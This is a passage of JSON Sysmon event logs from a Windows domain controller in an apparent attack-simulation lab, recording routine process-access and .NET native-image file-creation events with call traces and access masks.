07:00:00.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7194,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:00.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:00.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7195,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:00.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:00.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7196,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:00.525\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-12F0-5F25-0000-00106B800A00}\r\nTargetProcessId: 4544\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:00.525","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-12F0-5F25-0000-00106B800A00}","TargetProcessId":"4544","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7197,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:00.556\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:00.556","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7198,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:00:00.634\r\nProcessGuid: {E2A3D6B1-12F0-5F25-0000-00100C7D0A00}\r\nProcessId: 4420\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1144-0\\System.Xml.Linq.dll\r\nCreationUtcTime: 2020-08-01 07:00:00.634","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:00:00.634","ProcessGuid":"{E2A3D6B1-12F0-5F25-0000-00100C7D0A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1144-0\\System.Xml.Linq.dll","CreationUtcTime":"2020-08-01 07:00:00.634","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7199,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:00.665\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12F0-5F25-0000-0010ED820A00}\r\nTargetProcessId: 4724\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:00.665","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12F0-5F25-0000-0010ED820A00}","TargetProcessId":"4724","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7200,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:00.665\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12F0-5F25-0000-0010ED820A00}\r\nTargetProcessId: 4724\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:00.665","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12F0-5F25-0000-0010ED820A00}","TargetProcessId":"4724","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7201,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:00.665\r\nSourceProcessGUID: {E2A3D6B1-12F0-5F25-0000-00106B800A00}\r\nSourceProcessId: 4544\r\nSourceThreadId: 2772\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:00.665","SourceProcessGUID":"{E2A3D6B1-12F0-5F25-0000-00106B800A00}","SourceProcessId":"4544","SourceThreadId":"2772","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7202,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:00.665\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12F0-5F25-0000-0010ED820A00}\r\nTargetProcessId: 4724\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 